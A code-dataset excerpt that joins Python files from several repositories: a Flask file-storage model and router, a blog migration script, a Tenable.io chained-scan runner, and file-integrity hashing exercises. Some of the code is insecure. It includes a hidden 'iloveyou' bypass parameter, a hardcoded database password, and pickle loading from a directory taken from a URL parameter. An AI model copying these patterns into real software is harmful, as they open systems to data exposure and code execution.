def is_dir(self):
return True
def rename(self, newname):
newname = secure_filename(newname)
self.name = newname
self.save()
return self
def move(self, newpath):
filepath = newpath.child_paths.filter_by(name=self.name).first()
if not filepath:
self.parent_id = newpath.id
self.save()
return self
for fp in self.child_paths:
fp.move(filepath)
for f in self.files:
f.move(filepath)
self.delete()
return filepath
def copy(self, newpath):
        # TODO: performance optimization
filepath = newpath.child_paths.filter_by(name=self.name).first()
if not filepath:
filepath = FilePath(
name=self.name,
bucket_id=self.bucket_id,
parent_id=newpath.id,
)
filepath.save()
for fp in self.child_paths:
fp.copy(filepath)
for f in self.files:
f.copy(filepath)
return filepath
def __str__(self):
if self.is_root_path:
return self.name
return os.path.join(
self.parent_path.__str__(),
self.name,
)
class File(ModelTimeMixin, db.Model):
__tablename__ = 'file'
FILE_TYPE = ("IMAGE", "CSS", "JS")
FILE_IMAGE = "IMAGE"
name = db.Column(db.String(108), nullable=False)
file_type = db.Column(db.String(108), nullable=False)
hash = db.Column(db.String(1024), nullable=False)
size = db.Column(db.Integer, nullable=False, default=0)
path_id = db.Column(
db.Integer,
db.ForeignKey('filepath.id', ondelete="CASCADE"),
nullable=False)
path = db.relationship(
FilePath,
backref=db.backref(
'files', cascade='all,delete-orphan', lazy='dynamic'),
lazy='joined',
uselist=False)
@property
def abspath(self):
return os.path.join(
self.path.abspath,
self.name,
)
@property
def relpath(self):
return os.path.join(
self.path.relpath,
self.name,
)
@property
def url(self):
args = dict(filename=self.relpath, _external=True)
if config.HTTPS:
args.update(**dict(_scheme="https"))
if self.file_type.startswith("image"):
args.update(type="mini")
return url_for("storage.show", **args)
@property
def is_dir(self):
return False
def save(self):
self.name = self.name.strip("/")
if "/" in self.name:
s = self.name.split("/")
filepath = FilePath.query.filter_by(id=self.path_id).first()
filepath = filepath.bucket.get_root_path("/".join(s[:-1]), True)
self.name = s[-1]
self.path_id = filepath.id
return super(File, self).save()
def copy(self, newpath):
f = File(
name=self.name,
file_type=self.file_type,
hash=self.hash,
path_id=newpath.id,
)
f.save()
return f
def move(self, newpath):
        self.path_id = newpath.id
self.save()
return self
def rename(self, newname):
newname = secure_filename(newname)
self.name = newname
self.save()
return self
def __repr__(self):
return '<File %r>' % self.name
def __str__(self):
return self.name
@event.listens_for(Bucket, 'after_update')
def bucket_update_listen(mapper, connection, target):
oldname = target.name
newname = target.name
history = get_history(target, "name")
if history.added and history.deleted:
oldname = history.deleted[0]
newname = history.added[0]
oldpath = os.path.join(
config.UPLOAD_FOLDER,
oldname,
)
newpath = os.path.join(
config.UPLOAD_FOLDER,
newname,
)
if oldpath != newpath and os.path.exists(oldpath):
os.rename(oldpath, newpath)
@event.listens_for(Bucket, 'after_delete')
def bucket_delete_listen(mapper, connection, target):
filepath = target.abspath
if os.path.exists(filepath):
os.rmdir(filepath)
@event.listens_for(FilePath, 'after_update')
def filepath_update_listen(mapper, connection, target):
change = {
"name": (target.name, target.name),
"bucket": (target.bucket, target.bucket)
}
history = get_history(target, "bucket")
if history.added and history.deleted:
change["bucket"] = (history.deleted[0], history.added[0])
history = get_history(target, "name")
if history.added and history.deleted:
change["name"] = (history.deleted[0], history.added[0])
oldpath = os.path.join(
change["bucket"][0].abspath,
change["name"][0],
)
newpath = os.path.join(
change["bucket"][1].abspath,
change["name"][1],
)
if oldpath != newpath and os.path.exists(oldpath):
os.rename(oldpath, newpath)
@event.listens_for(File, 'after_update')
def file_update_listen(mapper, connection, target):
change = {
"name": (target.name, target.name),
"path": (target.path, target.path),
"hash": (target.hash, target.hash),
}
history = get_history(target, "hash")
if history.added and history.deleted:
change["hash"] = (history.deleted[0], history.added[0])
history = get_history(target, "name")
if history.added and history.deleted:
change["name"] = (history.deleted[0], history.added[0])
history = get_history(target, "path")
if history.added and history.deleted:
change["path"] = (history.deleted[0], history.added[0])
oldpath = os.path.join(
change["path"][0].abspath,
change["name"][0],
)
newpath = os.path.join(
change["path"][1].abspath,
change["name"][1],
)
file_change = change["hash"][0] != change["hash"][1]
filepath_change = oldpath != newpath and os.path.exists(oldpath)
if file_change and filepath_change:
os.remove(oldpath)
if not file_change and filepath_change:
dirname = os.path.dirname(newpath)
if not os.path.exists(dirname):
os.makedirs(dirname)
os.rename(oldpath, newpath)
dirname = os.path.dirname(oldpath)
if not os.listdir(dirname):
os.rmdir(dirname)
@event.listens_for(File, 'after_delete')
def file_delete_listen(mapper, connection, target):
filepath = target.abspath
if os.path.exists(filepath):
os.remove(filepath)
dirname = os.path.dirname(filepath)
if os.path.exists(dirname) and not os.listdir(dirname):
os.rmdir(dirname)
```
#### File: App/storage/router.py
```python
import os
from datetime import datetime as dt
from datetime import timedelta
from flask import abort, make_response, request, send_from_directory
from maple.utils import MethodView
from . import config
from .util import file_is_image, gen_thumb_image, referer_is_block
class FileShowView(MethodView):
cache_time = 3600
def render_image(self, filename):
'''
默认设置为webp, 减少传输大小
'''
typ = request.args.get("type")
width = request.args.get("width", 0, type=int)
height = request.args.get("height", 0, type=int)
if typ == "iloveyou": # 哈哈
return send_from_directory(config.UPLOAD_FOLDER, filename)
if typ == "mini":
width, height = 120, 0
elif typ == "small":
width, height = 360, 0
elif typ == "thumb":
width, height = 600, 0
elif typ == "show":
width, height = 960, 0
elif width == height == 0:
width, height = 960, 0
img = os.path.join(config.UPLOAD_FOLDER, filename)
stream = gen_thumb_image(img, width, height)
buf_value = stream.getvalue()
response = make_response(buf_value)
max_age = 30 * 3600 * 24
response.mimetype = "image/webp"
        # Do not set last_modified, to avoid an extra round trip between browser and server
# response.last_modified = os.path.getmtime(img)
response.expires = dt.utcnow() + timedelta(seconds=max_age)
# response.cache_control.public = True
response.cache_control.max_age = max_age
response.add_etag()
return response.make_conditional(request)
def get(self, filename):
if referer_is_block(request):
abort(403)
if not os.path.exists(os.path.join(config.UPLOAD_FOLDER, filename)):
abort(404)
if file_is_image(filename):
return self.render_image(filename)
return send_from_directory(config.UPLOAD_FOLDER, filename)
```
#### File: static/script/upgrade.py
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import sys
import os
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
from runserver import app
from maple.extension import db, redis
from maple.model import (Blog, Tag, Category, User, TimeLine, Question,
tag_blog)
engine = create_engine('postgresql://postgres:password@localhost/blog_backup')
session = sessionmaker(bind=engine)()
def date(i):
return {"created_at": i.created_at, "updated_at": i.updated_at}
def upgrade_user():
print('upgrade user ...')
users = session.execute('select * from users;')
User.bulk_save([User(
id=user.id,
username=user.username,
email=user.email,
password=<PASSWORD>,
is_superuser=user.is_superuser,
is_confirmed=user.is_confirmed) for user in users])
def upgrade_timeline():
print('upgrade timeline ...')
timelines = session.execute('select * from timeline;')
Tag.bulk_save([TimeLine(
id=i.id,
content=i.content,
is_hidden=i.hide,
user_id=i.author_id,
**date(i)) for i in timelines])
def upgrade_question():
print('upgrade question ...')
questions = session.execute('select * from questions;')
Question.bulk_save([Question(
id=i.id,
title=i.title,
is_hidden=i.is_private,
answer=i.answer,
description=i.describ,
user_id=i.author_id,
created_at=i.created_at) for i in questions])
def upgrade_blog():
print('upgrade tag ...')
tags = session.execute('select * from tags;')
Tag.bulk_save([Tag(id=i.id, name=i.name) for i in tags])
print('upgrade category ...')
categories = session.execute('select * from categories;')
Category.bulk_save([Category(id=i.id, name=i.name) for i in categories])
print('upgrade blog ...')
blogs = session.execute('select * from blogs;')
Blog.bulk_save([Blog(
id=blog.id,
title=blog.title,
content=blog.content,
content_type=blog.content_type,
is_copy=blog.is_copy,
category_id=blog.category_id,
user_id=blog.author_id,
**date(blog)) for blog in blogs])
print('upgrade tag_blog ...')
tag_blogs = session.execute('select * from tag_blog;')
db.engine.execute(tag_blog.insert(), [{
'tag_id': i.tags_id,
'blog_id': i.blogs_id
} for i in tag_blogs])
def upgrade_setval():
print('upgrade setval ...')
db.engine.execute("select setval('tag_id_seq',(select max(id) from tag))")
db.engine.execute(
"select setval('blog_id_seq',(select max(id) from blog))")
db.engine.execute(
"select setval('category_id_seq',(select max(id) from category))")
db.engine.execute(
"select setval('timeline_id_seq',(select max(id) from timeline))")
db.engine.execute(
"select setval('question_id_seq',(select max(id) from question))")
db.engine.execute(
"select setval('user_id_seq',(select max(id) from \"user\"))")
def upgrade_redis():
print("upgrade redis ...")
redis.rename("visited:article", "count:article:visited")
if __name__ == '__main__':
with app.app_context():
upgrade_user()
upgrade_blog()
upgrade_timeline()
upgrade_question()
upgrade_setval()
upgrade_redis()
```
|
{
"source": "jeff-a-holland-codecov/Chain.py-Tenable-IO-Chained-Scanning-Application",
"score": 2
}
|
#### File: Chain.py-Tenable-IO-Chained-Scanning-Application/chain/chain.py
```python
import argparse
import textwrap
import os
from dotenv import load_dotenv
# Argparse and dotenv documentation:
# - https://docs.python.org/2/library/argparse.html
# - https://pypi.org/project/python-dotenv/
# Function to chmod log files to 600 (rw for owner only) once data has been
# written to the log file.
def fix_perms(filepath):
"""Function for file permission changes"""
file_status = str(os.path.exists(filepath))
if file_status == 'True':
os.chmod(filepath, 0o600)
# End of Function
# Main function
def main():
"""Main function in chain.py"""
### Check for existence of .env file in local directory. If not there,
### exit.
file_status = str(os.path.exists('.env'))
if file_status != 'True':
print ('\n The .env file does not exist. Create this file and ' \
               'populate it with your API keys per the README.\n')
print ('Exiting...\n')
exit()
### Load Tenable IO API keys from the .env file stored in the current
### directory. Make sure you chmod the file 600 to protect it, and
### assign ownership as necessary. A check below will set the perms to
### 600 if it's not already. Note this check does not run if using the
### -h/--help flag. It only works with create/delete/run args.
### Format of the .env is:
# ACCESS_KEY=<access key goes here>
    # SECRET_KEY=<secret key goes here>
###
load_dotenv()
access_key = os.getenv('ACCESS_KEY')
secret_key = os.getenv('SECRET_KEY')
### Check for blank API keys or the stub value in the .env file
if access_key == '' or secret_key == '' or \
access_key == '<access_key>' or secret_key == '<secret_key>':
print ('\n One or more API keys were not declared in the .env file ' \
' properly.')
print (' Exiting...\n')
exit()
###Configure command line options using argparse
parser = argparse.ArgumentParser(formatter_class=\
argparse.RawTextHelpFormatter)
parser.add_argument('--action', choices=['create', 'run', 'delete',
'create-run', 'delete-create',
'delete-create-run', 'info'],
help=textwrap.dedent('''
NOTES:
- You cannot delete and then run scans (delete-run), nor create and
then delete scans (create-delete). Similarly, create-delete-run is
not supported.
- The "info" flag will output the folder, scanner, policy, and tag
      name:ID dictionaries to log.info to assist in building scan
definitions in the scans.ini file. Run "./chain.py --action info"
      to generate this log. The data is also sent to STDOUT, however
it is easier to search/grep from the log.info flat file.
- The create/delete/run scripts all log to log.chain in the logs
subdirectory. The log file is set to rotate when the size reaches
100K bytes, and keeps a history of 5 log files (log.chain.5 being
the oldest and log.chain being the current). Successive
instantiations of the run.py script will also log to log.chain.
The script name is in the log.chain file, such as "create.py" in
the second field (fields delimited by double-colons). Note that
the log.info file is cleared on every run of the
create/delete/run scripts. This is fine as this data is mutable
and should be queried every time a scan in scans.ini is configured
or updated.
'''))
args = parser.parse_args()
# Test to see if logs subdir exists, and if not, create/chmod it
if not os.path.exists('logs'):
os.makedirs('logs')
os.chmod('logs', 0o700)
# Test if .env file exists, and if so, chmod it. This file contains
# your API keys, so needs to be secured as much as file permissions
# allow. Note this check is not executed when using the -h/--help
# argument. These perms should alrady be 600, but double checking.
fix_perms('./.env')
# Check for --action arguments. Will import
# necessary .py scripts to create .pyc bytecode
# files. Also run fix_perms function to chmod file.
if args.action == 'create':
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
fix_perms('./logs/log.chain')
elif args.action == 'run':
import run
run.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'delete':
import delete
delete.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'create-run':
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
import run
run.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'delete-create':
import delete
delete.main(access_key, secret_key)
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
fix_perms('./logs/log.chain')
elif args.action == 'delete-create-run':
import delete
delete.main(access_key, secret_key)
import info
info.main(access_key, secret_key)
import create
create.main(access_key, secret_key, info.folder_dict, \
info.scanner_dict, info.policies_dict, info.tag_dict)
import run
run.main(access_key, secret_key)
fix_perms('./logs/log.chain')
elif args.action == 'info':
import info
info.main(access_key, secret_key)
fix_perms('./logs/log.info')
else:
        print ('\n ERROR. No arguments supplied when running the chain.py script.')
print (' Run "./chain.py --help" to see usage info.\n')
print (' Exiting...\n')
exit()
if __name__ == '__main__':
main()
```
#### File: Chain.py-Tenable-IO-Chained-Scanning-Application/chain/run.py
```python
import json
import sys
import time
import configparser
import logging
from logging.config import fileConfig
import requests
# Print info to log.chain in ./logs subdir, as well as to STDOUT
# See logging.ini for logging configuration
# See:
# https://docs.python-guide.org/writing/logging
# https://www.machinelearningplus.com/python/python-logging-guide
# https://docs.python.org/2.4/lib/logging-config-fileformat.html
fileConfig('logging.ini')
logger = logging.getLogger('run')
# Local vars
chained_scan_names_in_order_list = []
scan_name_list = []
scan_id_dict = {}
chained_scan_id_list = []
scan_status = ''
previous_scan_history_list = []
# Function to get scan names
def get_scan_names():
"""Get scan names from IO"""
#Vars are defined in the scans.ini file
#Parse them for each scan
config = configparser.ConfigParser()
config.read('scans.ini')
config_scans_list = config.sections()
try:
for section in config_scans_list:
scan_name = config.get(section, 'scan_name')
chained_scan_names_in_order_list.append(scan_name)
except:
error = sys.exc_info()[0]
logger.info('ERROR: Scan definition in scans.ini is not configured' \
' properly')
logger.info(f'ERROR: {error}')
logger.info('Exiting...')
exit()
# End of function
# Function to run scan
def run_scan(scan_id, headers):
"""Run scans defined in scans.ini config file"""
try:
url = f"https://cloud.tenable.com/scans/{scan_id}/launch"
response = requests.request("POST", url, headers=headers)
response.raise_for_status()
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
# End function
# Funtion to check scan status
def check_scan_status(scan_id, scan_status, headers):
"""Check status of scan by polling API every 30sec"""
logger.info('Function check_scan_status has been called')
while scan_status == 'running' or scan_status == 'pending' or \
scan_status == 'None':
url = f"https://cloud.tenable.com/scans/{scan_id}"
try:
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data3 = (json.dumps(pretty_json, indent=2))
data_dict3 = json.loads(data3)
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
# Don't need a condition for 'None' as scan status is now either
# pending, running, or completed
if data_dict3['history'][0].values() and \
(data_dict3['history'][0]['status'] == 'running' or \
data_dict3['history'][0]['status'] == 'pending'):
logger.info(f'Scan ID {scan_id} still running')
# Sleep 30sec between successive API calls
time.sleep(30)
elif data_dict3['history'][0].values() and \
data_dict3['history'][0]['status'] == 'completed':
logger.info(f'Scan completed for scan ID {scan_id}')
scan_status = 'completed'
logger.info('Function check_scan_status processing has completed')
# End of function
# main function
def main(access_key, secret_key):
"""Main function for run.py script"""
logger.info(' Running the run.py script')
# Global vars
global history_cntr
global headers
headers = {
'accept': "application/json",
'content-type': "application/json",
'x-apikeys': f"accessKey={access_key};secretKey={secret_key}"}
# Set history counter for use in preventing clobbering of
# past instansiation of scans with a new one
history_cntr = 0
# Call function to get scan names from scans.ini file
get_scan_names()
# Get list of scans
try:
url = "https://cloud.tenable.com/scans"
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data = (json.dumps(pretty_json, indent=2))
data_dict = json.loads(data)
length = len(data_dict['scans'])
response.raise_for_status()
logger.info(f'Number of total scans in IO instance is: {length}')
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
# Beginning of the section that runs scans
logger.info('Running the following scans in a chained manner,' \
                ' in the following top-down order, one at a time:')
for scan in chained_scan_names_in_order_list:
logger.info(f'{scan}')
# Check if at least two scans are defined in scans.ini as we're doing
# chained scanning. If not, exit. We can't run scans that don't exist.
if chained_scan_names_in_order_list == '' or \
len(chained_scan_names_in_order_list) == 1:
logger.info('ERROR: At least two scans must be defined in scans.ini')
logger.info('Exiting...')
exit()
cntr = 0
for scan in data_dict['scans']:
scan_id = data_dict['scans'][cntr]['id']
scan_name = data_dict['scans'][cntr]['name']
cntr += 1
scan_id_dict[scan_name] = scan_id
# Counter to see when a scan is defined in scans.ini file
# but not in IO. This counter should stay 0 if all is well.
scans_ini_scans_dict_cntr = 0
#for key, value in scan_id_dict.iteritems():
for key, value in scan_id_dict.items():
for scan in chained_scan_names_in_order_list:
if scan not in scan_id_dict:
scans_ini_scans_dict_cntr += 1
if key == scan:
value = int(value)
chained_scan_id_list.append(value)
# Check if we have the same number of scans in scans.ini as in the
# scans_id_dict dictionary. If not, we're trying to run one or more
# scans that do not exist in IO. Hence, exit.
# If not, exit. We can't run scans that don't exist.
if scans_ini_scans_dict_cntr > 0:
logger.info('ERROR: One or more scans defined in scans.ini do not' \
' exist in IO')
logger.info('Exiting...')
exit()
list_as_str = str(chained_scan_id_list)
    logger.info('List of scan IDs that will run in order, one at a' \
f' time: {list_as_str}')
# Populate previous_scan_history_list so we can check later if a second
# instantiation of the scripts still has any scans running
for scan_id in chained_scan_id_list:
try:
url = f"https://cloud.tenable.com/scans/{scan_id}"
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data2 = (json.dumps(pretty_json, indent=2))
data_dict2 = json.loads(data2)
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
if data_dict2['history'] != []:
previous_scan_history_list.append( \
data_dict2['history'][0]['status'])
# Iterate over the chained_scan_id_list again, this time using
# the list previous_scan_history_list built above
for scan_id in chained_scan_id_list:
try:
url = f"https://cloud.tenable.com/scans/{scan_id}"
response = requests.request("GET", url, headers=headers)
pretty_json = json.loads(response.text)
data4 = (json.dumps(pretty_json, indent=2))
data_dict4 = json.loads(data4)
except requests.HTTPError as e:
logger.info(f'ERROR - {e}')
sys.exit()
if data_dict4['history'] != []:
dict_val_as_str = str(data_dict4['history'][0]['status'])
logger.info(f'History status for scan_id {scan_id} is:' \
                        f' {dict_val_as_str}')
# Let's check if a previous instantiation of the scripts
# still has any scans running. If so, exit.
# This check only gets run when all scans have a 'completed'
# history status, and it's the first time this if statement
# is evaluated
history_list_as_str = str(previous_scan_history_list)
logger.info('previous_scan_history_list BEFORE historical run' \
f' check is: {history_list_as_str}')
if data_dict4['history'] != [] and \
data_dict4['history'][0].values() and \
history_cntr == 0 and \
('running' in previous_scan_history_list or \
'pending' in previous_scan_history_list):
logger.info(f'Scan for ID {scan_id} is pending, already running ' \
'or a second instantiation of this script is' \
' trying to run before the previous one finished')
history_list_as_str = str(previous_scan_history_list)
logger.info('previous_scan_history_list AFTER historical' \
f' run check is: {history_list_as_str}')
logger.info(' Exiting....')
exit()
if data_dict4['history'] == []:
#Call function to run scan using scan_id
run_scan(scan_id, headers)
logger.info('NOTE: Null scan history')
logger.info(f'Running scan for ID {scan_id} for the first time')
# Increment history as no scans in the chain were running
history_cntr += 1
# Scan has never run before, so hardcode status.
# It gets updated in the check_scan_status function.
scan_status = 'None'
# Call check_scan_status function, which will wait for a
# run_status of 'complete' before returning
check_scan_status(scan_id, scan_status, headers)
elif data_dict4['history'][0].values() and \
data_dict4['history'][0]['status'] == 'completed':
# Call function to run scan using scan_id
run_scan(scan_id, headers)
logger.info(f'Scan for ID {scan_id} has run previously and '\
                        'completed. Will run again now.')
# Increment history as no scans in the chain were running
history_cntr += 1
# Scan has run before, but completed. Run it again and
# hardcode status to pending.
# It gets updated in the check_scan_status function.
scan_status = 'pending'
# Add scan_id to previous_scan_history_list
previous_scan_history_list.append(scan_id)
# Call check_scan_status function, which will wait for a
# run_status of 'complete' before returning
check_scan_status(scan_id, scan_status, headers)
else:
logger.info('ERROR. Exiting....')
exit()
logger.info('Scan execution/running finished successfully.')
print (' See "log.chain" in the logs subdirectory for script output\n')
if __name__ == '__main__':
print ('\n Do not execute this script directly.')
print (' Instead, execute chain.py using an argument.')
print (' Run the command "./chain.py --help" to see usage info.\n')
print (' Exiting...\n')
exit()
```
|
{
"source": "jeff-a-holland/python_class_2021_B2",
"score": 3
}
|
#### File: python_class_2021_B2/exercise_11/solution.py
```python
import os
import hashlib
import pickle
from datetime import datetime
class FileInfo(object):
"""FileInfo class to create object with list of dictionaries"""
object_list = []
def __init__(self, test_dir):
self.test_dir = test_dir
def get_file_info(self):
self.filename = ''
self.timestamp = ''
self.sha1 = ''
for file in os.listdir(self.test_dir):
file_path = os.path.join(self.test_dir, file)
if os.path.isfile(file_path) and not file_path.endswith('FileList'):
                # Compute timestamp of when file was last changed (in local time)
self.filename = file_path
mtime = os.stat(file_path).st_mtime
self.timestamp = datetime.fromtimestamp(mtime) \
.strftime('%Y-%m-%d-%H:%M')
# Compute sha1 hash of file, reading in 2^16 bytes at a time in
# binary mode in case the file is too large for memory
sha1sum = hashlib.sha1()
with open(file_path, 'rb') as source:
block = source.read(2**16)
while len(block) != 0:
sha1sum.update(block)
block = source.read(2**16)
self.sha1 = sha1sum.hexdigest()
FileInfo.object_list.append({'filename': self.filename,
'timestamp': self.timestamp,
'sha1': self.sha1})
class FileList(FileInfo):
"""FileList class that subclasses FileInfo to determine if any files were
changed, removed, or added (based on existence or sha1 hash value). Any files
that remain unchanged will not be reported upon."""
pickle_list = []
pickled_obj = b''
def scan(self):
for d in FileInfo.object_list:
fullfilepath = (d['filename'])
filedir = os.path.dirname(d['filename'])
filename = os.path.basename(d['filename'])
timechanged = (d['timestamp'])
sha1 = (d['sha1'])
timeaccessed = datetime.now().strftime('%Y-%m-%d-%H:%M')
info_dict = {'fullfilepath': fullfilepath, 'filedir': filedir,
'filename': filename, 'timechanged': timechanged,
'sha1': sha1, 'timeaccessed': timeaccessed}
FileList.pickle_list.append(info_dict)
FileList.pickled_obj = pickle.dumps(FileList.pickle_list)
filelist_fullpath = self.test_dir + 'FileList'
        if not os.path.isfile(filelist_fullpath):
print('\n################################################################')
print('Pickled file does not exist. Creating pickle file "FileList" in:')
print('################################################################')
print('\n', self.test_dir)
with open(filelist_fullpath, 'wb') as fh:
fh.write(FileList.pickled_obj)
else:
print('\n######################################')
print('Pickle file "FileList" already exists.')
print('######################################')
print('Skipping creation...')
def rescan(self):
filelist_fullpath = self.test_dir + 'FileList'
with open(filelist_fullpath, 'rb') as fh:
data = fh.read()
unpickled_object = pickle.loads(data)
print('\n#####################################################')
print('Pickled file "FileList" contents after unpickling is:')
print('#####################################################\n')
print(unpickled_object, '\n')
pickled_files_list = []
disk_files_list = []
results_dict = {}
changed_list = []
added_list = []
removed_list = []
print('###############################################################'
'######################')
print('File changes detected since initial file checksum and pickled '
'file baseline creation:')
print('###############################################################'
'######################\n')
for d in unpickled_object:
fullfilepath_orig = d['fullfilepath']
pickled_files_list.append(fullfilepath_orig)
for file in os.listdir(self.test_dir):
fullfilepath_new = os.path.join(self.test_dir, file)
if os.path.isfile(fullfilepath_new) and not fullfilepath_new.endswith('FileList'):
disk_files_list.append(fullfilepath_new)
sha1_new = hashlib.sha1(open(fullfilepath_new, 'rb').read()).hexdigest()
if fullfilepath_orig == fullfilepath_new and \
d['sha1'] == sha1_new:
                        print(f'existing file "{fullfilepath_orig}" unchanged')
elif fullfilepath_orig == fullfilepath_new and \
d['sha1'] != sha1_new:
changed_list.append(fullfilepath_orig)
print(f'existing file "{fullfilepath_orig}" CHANGED')
for file in pickled_files_list:
if file not in disk_files_list:
removed_list.append(file)
print(f'previous file "{file}" was REMOVED')
break
for file in disk_files_list:
if file not in pickled_files_list:
added_list.append(file)
print(f'new file "{file}" was ADDED')
break
results_dict = {'added': added_list, 'removed': removed_list, 'changed': changed_list}
print('\n######################################')
print('results_dict with all file changes is:')
print('######################################\n')
print(results_dict, '\n')
return results_dict
def main():
# Testing directory. Modify as necessary.
test_dir = '/Users/jeff/Documents/GitHub/python_class_2021_B2/exercise_11/'
fi = FileInfo(test_dir)
fi.get_file_info()
fl = FileList(test_dir)
fl.scan()
fl.rescan()
if __name__ == '__main__':
main()
```
#### File: python_class_2021_B2/exercise_13/solution.py
```python
import os
import json
import hashlib
import pickle
from datetime import datetime
from flask import Flask, request
app = Flask(__name__)
def check_dir(directory):
"""Make sure directory given as an argument in the URL ends in '/'"""
if not directory.endswith('/'):
directory += '/'
return directory
class FileInfo(object):
"""FileInfo class to create object with list of dictionaries"""
object_list = []
pickle_file_status = ''
def __init__(self, return_list, directory):
self.directory = directory
self.return_list = return_list
self.file_list = self.return_list
self.target_dir = self.directory
def get_file_info(self):
"""Get the file info from the pickled hash database"""
self.filename = ''
self.timestamp = ''
self.sha1 = ''
for file in self.file_list:
            # Compute timestamp of when file was last changed (in local time)
self.filename = file
mtime = os.stat(file).st_mtime
self.timestamp = datetime.fromtimestamp(mtime) \
.strftime('%Y-%m-%d-%H:%M')
# Compute sha1 hash of file, reading in 2^16 bytes at a time in
# binary mode in case the file is too large for memory
sha1sum = hashlib.sha1()
with open(file, 'rb') as source:
block = source.read(2**16)
while len(block) != 0:
sha1sum.update(block)
block = source.read(2**16)
self.sha1 = sha1sum.hexdigest()
FileInfo.object_list.append({'filename': self.filename,
'timestamp': self.timestamp,
'sha1': self.sha1})
def scan(self):
"""Scan method for creating pickled FileList hash database, or for
reading the existing FileList file. Located here instead of FileList
class"""
self.pickle_list = []
self.pickled_obj = b''
for d in FileInfo.object_list:
fullfilepath = (d['filename'])
filedir = os.path.dirname(d['filename'])
filename = os.path.basename(d['filename'])
timechanged = (d['timestamp'])
sha1 = (d['sha1'])
timeaccessed = datetime.now().strftime('%Y-%m-%d-%H:%M')
info_dict = {'fullfilepath': fullfilepath, 'filedir': filedir,
'filename': filename, 'timechanged': timechanged,
'sha1': sha1, 'timeaccessed': timeaccessed}
self.pickle_list.append(info_dict)
self.pickled_obj = pickle.dumps(self.pickle_list)
filelist_fullpath = self.target_dir + 'FileList'
        if not os.path.isfile(filelist_fullpath):
FileInfo.pickle_file_status = '<h3>Pickled file does NOT exist. ' \
'Creating it...</h3>'
with open(filelist_fullpath, 'wb') as fh:
fh.write(self.pickled_obj)
else:
FileInfo.pickle_file_status = '<h3>Pickled file already exists. ' \
'Skipping creation...</h3>'
class FileList(FileInfo):
"""FileList class that subclasses FileInfo to determine if any files were
changed, removed, or added (based on existence or sha1 hash value). Any files
that remain unchanged will not be reported upon."""
def __init__(self, directory):
self.directory = directory
def rescan(self):
filelist_fullpath = self.directory + 'FileList'
try:
with open(filelist_fullpath, 'rb') as fh:
data = fh.read()
unpickled_object = pickle.loads(data)
        except (FileNotFoundError, pickle.UnpicklingError):
raise Exception('Pickled file "FileList" does not exist. Exiting...')
pickled_files_list = []
disk_files_list = []
results_dict = {}
changed_list = []
added_list = []
removed_list = []
for d in unpickled_object:
fullfilepath_orig = d['fullfilepath']
pickled_files_list.append(fullfilepath_orig)
for file in os.listdir(self.directory):
fullfilepath_new = os.path.join(self.directory, file)
if os.path.isfile(fullfilepath_new) and \
not fullfilepath_new.endswith('FileList') and \
not fullfilepath_new.endswith('.DS_Store'):
disk_files_list.append(fullfilepath_new)
sha1_new = hashlib.sha1(open(fullfilepath_new, 'rb').read()).hexdigest()
if fullfilepath_orig == fullfilepath_new and \
d['sha1'] == sha1_new:
                        print(f'existing file "{fullfilepath_orig}" unchanged')
elif fullfilepath_orig == fullfilepath_new and \
d['sha1'] != sha1_new:
changed_list.append(fullfilepath_orig)
print(f'existing file "{fullfilepath_orig}" CHANGED')
for file in pickled_files_list:
if file not in disk_files_list:
removed_list.append(file)
print(f'previous file "{file}" was REMOVED')
break
for file in disk_files_list:
if file not in pickled_files_list:
added_list.append(file)
print(f'new file "{file}" was ADDED')
break
results_dict = {'added': added_list, 'removed': removed_list, 'changed': changed_list}
return results_dict
@app.route('/')
def home():
"""Web app home page function with usage"""
display_str = '<h2>Home page for the "Tamperserve" web application ' + \
'(solution.py):</h2><h3>UI/Browser Usage:</h3>' + \
'http://127.0.0.1:5000/scan?directory=DIRPATH<br><br>' + \
'  OR<br><br>' + \
'http://127.0.0.1:5000/rescan?directory=DIRPATH<br><br>' + \
                  '  WHERE<br><br>DIRPATH is a directory path such as: ' + \
'/Users/jeff<br><br><h3>For example:</h3>    ' + \
' http://127.0.0.1:5000/scan?directory=/Users/jeff<br><br>' + \
'<h3>Start application from the CLI as follows:</h3>' + \
'   ./solution.py<br><h3>NOTE:</h3>Make sure you '+ \
'have write access to the directory so the pickled FileList ' + \
'file can be created'
return display_str
@app.route('/scan')
def scan():
"""Scan function that scans the directory provided as an argument and create
the hash database 'FileList' on disk"""
directory = request.args['directory']
directory = check_dir(directory)
results_list = []
if os.path.isdir(directory):
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path) and file != 'FileList' \
and file != '.DS_Store':
results_list.append(file_path)
fi = FileInfo(results_list, directory)
fi.get_file_info()
fi.scan()
result = f'{FileInfo.pickle_file_status} Files are:<br><br>' + \
'<br>'.join(results_list)
else:
result = f'<h2>ERROR</h2><h3>{directory}<br><br> is NOT a directory.' \
'<h3>Please try again with a directory path that exists.</h3>'
return result
@app.route('/rescan')
def rescan():
"""Rescan function that loads pickled hash database from disk, called
FileList"""
result = ''
directory = request.args['directory']
directory = check_dir(directory)
exception = '<h3>Pickled hash database "FileList" AND/OR the directory given ' \
'as an argument do/does not exist.</h3> Run a scan first using the ' \
'"scan" endpoint if the directory is valid, otherwise use a ' \
'valid directory.<br><h3>Directory used was:</h3>'\
f'    {directory}'
if not os.path.isfile(directory + 'FileList'):
return exception
elif os.path.isdir(directory):
